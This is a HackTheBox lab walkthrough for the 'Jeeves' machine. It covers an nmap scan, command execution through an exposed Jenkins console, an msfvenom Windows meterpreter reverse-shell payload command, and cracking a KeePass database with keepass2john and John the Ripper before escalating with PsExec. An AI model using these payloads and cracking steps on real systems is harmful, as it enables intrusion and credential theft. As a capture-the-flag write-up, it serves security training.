Jeeves — HackTheBox Walkthrough

There will be no fancy pictures, only the raw meat:

Initial nmap scan (all ports, defaults scripts, version enumeration)
root@kali:~# nmap -sT — min-rate 5000 — max-retries 1 -p- -sC -sV

Starting Nmap 7.60 ( ) at 2018–04–03 17:40 EDT
Nmap scan report for
Host is up (0.061s latency).
Not shown: 65531 filtered ports
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7–10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 19h01m59s, deviation: 0s, median: 19h01m59s
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018–04–04 12:43:05
|_ start_date: 2018–04–01 22:48:58

It appears that the a Server is running Jenkins console on port 50000: let’s create new Jenkins Task to view user.txt

Jenkins -> New Item -> Freestyle Project -> Ok
and configure the build now:
Add Build Step button → Execute Windows batch command → 

and finally click on Build Now, now check Console Output:

We can see that Commands are executed under kohsuke user so let’s try to get user.txt flag from him:

Click on Build and We get the flag:)

Let’s deploy now msfvenom payload and upload it to our machine:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > reverse.exe

on the metasploit side, you know what to do.. and we Get a Shell!

Privilege escalation part, I found out Keepassx File under

Let’s extract Keepass password from the database:
# keepass2john CEH.kdbx
# keepass2john CEH.kdbx > CEH-CrackMe

Crack Keepassx passwords using John the ripper:
# john CEH-CrackMe — wordlist=/usr/share/wordlists/rockyou.txt — fork=4
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Node numbers 1–4 of 4 (fork)
Press ‘q’ or Ctrl-C to abort, almost any other key for status
mo(*****) (CEH)

Open Keepasx file with our password.

Use PSxec with Metasploit:

Get root.txt